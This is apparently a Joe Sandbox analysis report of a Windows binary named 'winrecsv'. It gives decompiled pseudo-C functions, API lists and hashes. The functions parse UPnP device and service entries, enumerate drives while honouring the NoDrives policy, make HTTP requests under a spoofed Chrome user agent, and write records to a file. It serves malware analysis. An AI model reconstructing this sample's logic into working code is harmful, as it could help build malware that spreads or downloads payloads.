                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd7
                                                                                  0x0040cce0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cce6
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd43
                                                                                  0x0040cd54
                                                                                  0x0040cd56
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cd93
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdab
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdb5
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc3
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdcd
                                                                                  0x0040cdd1
                                                                                  0x0040cdd5
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x0040cde1
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf7
                                                                                  0x0040cb00
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cb06
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb63
                                                                                  0x0040cb74
                                                                                  0x0040cb76
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbb3
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcb
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbd5
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe3
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbed
                                                                                  0x0040cbf1
                                                                                  0x0040cbf5
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x0040cc01
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				long _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_v20 = GetLogicalDrives();
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002;
                                                                                  				_v8 = 0x80000001;
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20;
                                                                                  			}












                                                                                  0x004048cc
                                                                                  0x004048cf
                                                                                  0x004048d6
                                                                                  0x004048dd
                                                                                  0x004048e4
                                                                                  0x004048f6
                                                                                  0x0040491c
                                                                                  0x0040491e
                                                                                  0x00404925
                                                                                  0x00404949
                                                                                  0x00404957
                                                                                  0x00404957
                                                                                  0x0040495e
                                                                                  0x0040495e
                                                                                  0x004048f3
                                                                                  0x004048f3
                                                                                  0x00404971

                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;
                                                                                  				long _v24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0);
                                                                                  				if(_v16 != 0) {
                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}








                                                                                  0x0040d7f6
                                                                                  0x0040d80d
                                                                                  0x0040d814
                                                                                  0x0040d82c
                                                                                  0x0040d833
                                                                                  0x0040d835
                                                                                  0x0040d84f
                                                                                  0x0040d85c
                                                                                  0x0040d86e
                                                                                  0x0040d870
                                                                                  0x0040d870
                                                                                  0x0040d878
                                                                                  0x0040d878
                                                                                  0x0040d882
                                                                                  0x0040d882
                                                                                  0x0040d88e

                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							_v28 = CreateFileW(0x414620, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}





















                                                                                  0x00404588
                                                                                  0x00404591
                                                                                  0x0040459b
                                                                                  0x0040459f
                                                                                  0x004045a4
                                                                                  0x004045ac
                                                                                  0x004045b6
                                                                                  0x004045bb
                                                                                  0x004045be
                                                                                  0x004045c5
                                                                                  0x004045cb
                                                                                  0x004045cf
                                                                                  0x004045d3
                                                                                  0x004045e5
                                                                                  0x004045e8
                                                                                  0x004045ee
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404603
                                                                                  0x00404612
                                                                                  0x00404621
                                                                                  0x0040462d
                                                                                  0x00404648
                                                                                  0x00404654
                                                                                  0x00404664
                                                                                  0x00404678
                                                                                  0x004046a6
                                                                                  0x004046b2
                                                                                  0x004046ce
                                                                                  0x004046d3
                                                                                  0x004046d6
                                                                                  0x00404614
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x00404612
                                                                                  0x004046e5
                                                                                  0x004046e7
                                                                                  0x004046f7
                                                                                  0x004046fc
                                                                                  0x00404702
                                                                                  0x00404704
                                                                                  0x00404706
                                                                                  0x00404710
                                                                                  0x00404710
                                                                                  0x00404704
                                                                                  0x00404718
                                                                                  0x00404724
                                                                                  0x00404726
                                                                                  0x00404746
                                                                                  0x00404749
                                                                                  0x0040474d
                                                                                  0x0040474f
                                                                                  0x00404761
                                                                                  0x00404764
                                                                                  0x0040476a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040477b
                                                                                  0x00404791
                                                                                  0x004047a2
                                                                                  0x0040475b
                                                                                  0x0040475b
                                                                                  0x0040475e
                                                                                  0x0040475e
                                                                                  0x004047ae
                                                                                  0x004047b8
                                                                                  0x004047b8
                                                                                  0x0040474d
                                                                                  0x00404726
                                                                                  0x004045c5
                                                                                  0x004047c3
                                                                                  0x004047d1

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(00414620,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2945370292-0
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}







                                                                                  0x0040bf56
                                                                                  0x0040bf61
                                                                                  0x0040c038
                                                                                  0x0040c03e
                                                                                  0x0040c03e
                                                                                  0x0040bf6a
                                                                                  0x0040bf74
                                                                                  0x0040bf7e
                                                                                  0x0040bf8a
                                                                                  0x0040bfaf
                                                                                  0x0040bfb9
                                                                                  0x0040bfd5
                                                                                  0x0040bfdc
                                                                                  0x0040bfec
                                                                                  0x0040bffa
                                                                                  0x0040c000
                                                                                  0x0040c00c
                                                                                  0x0040c01e
                                                                                  0x0040c01e
                                                                                  0x0040c024
                                                                                  0x0040c024
                                                                                  0x0040bfdc
                                                                                  0x0040bfb9
                                                                                  0x0040c032
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNEL32 ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
